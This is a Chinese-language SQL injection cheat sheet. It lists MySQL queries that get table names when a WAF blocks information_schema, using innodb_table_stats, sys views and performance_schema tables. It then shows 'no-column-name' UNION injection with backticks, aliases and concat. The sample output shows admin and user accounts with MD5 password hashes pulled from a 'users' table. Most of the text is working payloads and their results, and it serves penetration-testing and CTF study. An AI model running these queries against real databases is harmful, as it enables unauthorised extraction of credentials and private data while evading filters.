SQL注入限制条件下获取表名&无列名注入¶
获取表名¶
innodb存储引擎¶
Mysql>5.6.x 对于waf掉information_schema,可以利用innodb_table_stats和innodb_table_stats两个表来查询到 但是mysql默认是关闭InnoDB存储引擎的
select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();
sys¶
在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名
//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
//通过表文件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
包含之前查询记录的表
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
performance_schema
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
包含之前查询记录的表
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
包含表文件路径的表
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
无列名注入¶
利用join进行无列名注入¶
select 1,2,3,4 union select * from users;
| 1 | 2 | 3 | 4 |
|---|---|---|---|
| 1 | 2 | 3 | 4 |
| 1 | admin | e10adc3949ba59abbe56e057f20f883e | 1 |
| 2 | pikachu | 670b14728ad9902aecba32e22fa4f6bd | 2 |
| 3 | test | e99a18c428cb38d5f260853678922e03 | 3 |
select `3` from (select 1,2,3,4 union select * from users)a;
| 3 |
|---|
| 3 |
| e10adc3949ba59abbe56e057f20f883e |
| 670b14728ad9902aecba32e22fa4f6bd |
| e99a18c428cb38d5f260853678922e03 |
如果```被过滤,使用别名来代替:
select b from (select 1,2 as b,3,4 as c union select * from users)a;
| b |
|---|
| 2 |
| admin |
| pikachu |
| test |
同时查询多个列:
select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4 union select * from users)a;
| concat(b,0x2d,c) |
|---|
| 2-3 |
| admin-e10adc3949ba59abbe56e057f20f883e |
| pikachu-670b14728ad9902aecba32e22fa4f6bd |
| test-e99a18c428cb38d5f260853678922e03 |
Last update: 2021-04-25